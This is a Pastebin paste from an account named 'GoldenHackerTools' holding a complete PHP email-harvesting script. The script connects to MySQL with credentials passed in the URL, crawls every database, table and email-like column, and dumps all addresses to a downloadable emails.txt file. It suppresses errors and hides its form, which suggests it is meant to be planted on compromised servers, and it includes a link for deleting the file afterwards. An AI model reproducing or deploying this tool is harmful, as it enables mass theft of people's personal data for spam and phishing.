Advertisement
GoldenHackerTools

Golden Em

Apr 24th, 2017
264
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.14 KB | None | 0 0
  1. <?php
  2. @set_time_limit(0);error_reporting(0);
  3.  
  4. if(!empty($_GET["rm"])){unlink('emails.txt');echo '<script> alert("email file deleted");window.location="' . $_SERVER["PHP_SELF"] . '";</script>';}
  5. if(!empty($_GET["server"])){
  6. $vr=false;if(!empty($_GET["filesf"])){if($_GET["filesf"]=="on"){$vr=true;}}
  7. if($vr==true){ignore_user_abort(true);$fh = fopen("emails.txt", 'w') or die("can't open file " . getcwd() . '/emails.txt');}
  8. mysql_connect($_GET["server"], $_GET["user"], $_GET["pw"]) OR die("not connected");
  9. $res1 = mysql_query("SHOW DATABASES");
  10. echo 'Golden'. "\n";
  11. while ($row1 = mysql_fetch_assoc($res1)) {
  12. $res2 = mysql_query("SHOW TABLES FROM " . $row1['Database']);
  13. while ($row2 = mysql_fetch_assoc($res2)) {
  14. $res3 = mysql_query("SHOW COLUMNS FROM " . $row1['Database'] . "." . $row2['Tables_in_' . $row1['Database']]);
  15. while ($row3 = mysql_fetch_assoc($res3)) {
  16. if(strstr($row3['Field'], "email")) {
  17. $res4 = mysql_query("select " . $row3['Field'] ." FROM " . $row1['Database'] . "." . $row2['Tables_in_' . $row1['Database']]);
  18. while ($row4 = mysql_fetch_assoc($res4)) {if(!empty($row4[$row3['Field']])){if(strstr($row4[$row3['Field']], "@")){echo $row4[$row3['Field']] . "\n";if($vr==true){fwrite($fh, $row4[$row3['Field']] . "\n");}}}}
  19. }
  20. }
  21.  
  22. }
  23. }
  24. if($vr==true){fclose($fh);echo '</br><a href="emails.txt">Here are your Emails</a><span style="padding: 0 20px;"></span><a href="' . $_SERVER["PHP_SELF"] . '?rm=1">Remove email File</a>';}
  25. }else{
  26. echo '<form style="display:none;" method="GET"><table><tr><td>Server : <input type="text" name="server" value="localhost"\></td></tr><tr><td>User : <input type="text" name="user" value=""\></td></tr><tr><td>Password : <input type="text" name="pw" value=""\></td></tr><tr><td>Save-to-file : <input style="display:none;" type="checkbox" name="filesf"\></td></tr><tr><td><input type="submit" value="send"\></td></tr></table></form>';
  27. }
  28. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement